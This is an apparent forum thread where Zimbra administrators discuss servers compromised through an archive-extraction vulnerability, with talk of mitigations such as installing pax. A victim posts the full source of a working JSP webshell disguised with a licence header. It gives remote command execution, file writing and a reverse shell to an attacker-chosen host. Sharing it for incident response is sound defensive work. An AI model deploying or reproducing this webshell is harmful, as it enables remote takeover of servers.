Attacker managed to upload files into Web Client directory

[zenekbg]

Hi, we also get non newsletter.
Two of our server were exploited because of the vulnerability.
At this time AFAIK the attacker uploaded a malicious file called ZimbraBoot.jsp in /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp

If you have information how to doublecheck if the system is clean
after the patch, I will be happy to read it.

This is file ZimbraBoot.jsp

Code: Select all

<!-- * ***** BEGIN LICENSE BLOCK *****
* Zimbra Collaboration Suite Web Client
* Copyright (C) 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021, 2022 Synacor, Inc.
*
* This program is free software: you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software Foundation,
* version 2 of the License.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
* You should have received a copy of the GNU General Public License along with this program.
* If not, see <https://www.gnu.org/licenses/>.
* ***** END LICENSE BLOCK *****
-->
<%@ page import="java.io.*, java.util.Base64, java.nio.file.*, java.lang.*, java.io.*, java.net.*, java.util.*" %>
<% String output = "";
class StreamConnector extends Thread {
    InputStream wz;
    OutputStream yr;

    StreamConnector(InputStream wz, OutputStream yr) {
        this.wz = wz;
        this.yr = yr;
    }

public void run() {
    BufferedReader r  = null;
    BufferedWriter w = null;
    try {
        r  = new BufferedReader(new InputStreamReader(wz));
        w = new BufferedWriter(new OutputStreamWriter(yr));
        char buffer[] = new char[8192];
        int length;
        while((length = r.read(buffer, 0, buffer.length)) > 0) {
            w.write( buffer, 0, length );
            w.flush();
        }
    } catch( Exception e ) { }
    try {
        if (r != null) {
             r.close();
        }
        if (w != null) {
             w.close();
        }
   } catch( Exception e ) { }
}
}
String key = request.getParameter("key");
if (key != null && key.equals("fomggpztgpdbyvftnpafbjbevpjqfwemt")) {
    String action = request.getParameter("action");
    if (action != null) {
        if (action.equals("append")) {
            String file = request.getParameter("file");
            if (file != null) {
                String textBase64 = request.getParameter("text");
                if (textBase64 != null) {
                    String text = new String(Base64.getDecoder().decode(textBase64));
                    try {
                        Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.APPEND);
                    } catch(IOException e) {
                        e.printStackTrace();
                    } output+="Appended!";
                }
            }
        } else if (action.equals("exec")) {
                String cmdBase64 = request.getParameter("cmd");
                if (cmdBase64 != null) {
                    byte[] bytesEncoded = Base64.getDecoder().decode(cmdBase64);
                    String cmd = new String(bytesEncoded);String s = null;
                    try {
                        output += "Exec res: ";
                        Process p = Runtime.getRuntime().exec(cmd,null,null);
                        BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
                        while((s = sI.readLine()) != null) {
                            output += s;
                        }
                    } catch(IOException e) {
                        e.printStackTrace();
                    }
                }
        } else if (action.equals("sh")) {
                String ip = request.getParameter("ip");
                if (ip != null) {
                String port = request.getParameter("port");
                    if (port != null) {
                        try {
                            String suid = request.getParameter("suid");
                            StringBuffer shell = new StringBuffer();
                            if (suid == null) {
                                 shell.append("/bin/sh");
                            } else {
                                 shell.append(suid);
                                 shell.append(" -p");
                            }
                            Socket socket = new Socket(ip, Integer.parseInt(port));
                            Process process = Runtime.getRuntime().exec(shell.toString());
                            new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();
                            new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();
                            out.println("port opened on " + socket);
                        } catch( Exception e ) { }
                    }
                }
         } else if (action.equals("rewrite")) {
                String file = request.getParameter("file");
                if (file != null) {
                    String textBase64 = request.getParameter("text");
                    if (textBase64 != null) {
                        String text = new String(Base64.getDecoder().decode(textBase64));
                        try {
                            Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.TRUNCATE_EXISTING);
                        } catch(IOException e) {
                            e.printStackTrace();
                        }
                        output+="Rewritten!";
                   }
               }
        } else if (action.equals("create")) {
            String file = request.getParameter("file");
            if (file != null) {
                String textBase64 = request.getParameter("text");
                if (textBase64 != null) {
                    String text = new String(Base64.getDecoder().decode(textBase64));
                    try {
                         Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.CREATE);
                    } catch(IOException e) {
                        e.printStackTrace();
                    }
                    output+="Created!";
                }
            }
        }
    }
}%><%=output %>

[zenekbg]

---duplicate post---

[zenekbg]

---duplicate post---

[zenekbg]

Sorry for the duplicate posts, something is giving me a php error in the forum and think the pasted code is not working. Turns out I made 3-4 duplicate posts and was only able to delete the last one.

[jered]

The exploit code is GPL'ed, so remember this if you repurpose it for your own future exploits

Seriously, though, this is pretty terrifying -- to leave this un-patched without notification or an advisory for a month is awful. I wasn't able to find anything suspicious on my server, but I don't have confidence in its integrity given how severe this vulnerability is.

[BradC]

The exploit code is GPL'ed, so remember this if you repurpose it for your own future exploits

Seriously, though, this is pretty terrifying -- to leave this un-patched without notification or an advisory for a month is awful. I wasn't able to find anything suspicious on my server, but I don't have confidence in its integrity given how severe this vulnerability is.

If you had pax installed this is no vulnerability. If you didn't then all bets are off.

[rainer_d]

But only if MTA + web interface run on the same server?

He have historically always separated the two....

[tinnh1]

if MTA and MB run on the same server, we cannot exploit
I have done a POC for mail server ( multi server , MTA and Mailbox different server, cpio ver 2.11, not install pax, Centos ) , Cannot exploit
Anyone have same this situation?
Log :
Oct 12 15:15:23 mail1 amavis[114902]: (114902-06) (!)WARN: Using cpio instead of pax can be a security risk; please add: $pax='pax'; to amavisd.conf and check that the pax(1) utility is available on the system!
Oct 12 15:15:23 mail1 amavis[114902]: (114902-06) (!)Decoding of p003 (POSIX tar archive (GNU)) failed, leaving it unpacked: do_pax_cpio: exit 2 /usr/bin/cpio: cannot make directory `lucky': No such file or directory\n/usr/bin/cpio: lucky/ShareApp.jsp: Cannot open: No such file or directory\n5 blocks at (eval 140) line 1551

- Lucky is payload extension .tar

[dmouraomartins]

If you want a copy of this malicious attachment (news.jpg), you can private message me.

Please, I whould want a copy of this malicious attachment.
Thnx

[robertvon]

If you have information how to doublecheck if the system is clean
after the patch, I will be happy to read it.

At this time I have no information unfortunately.
I'm still double checking log files ...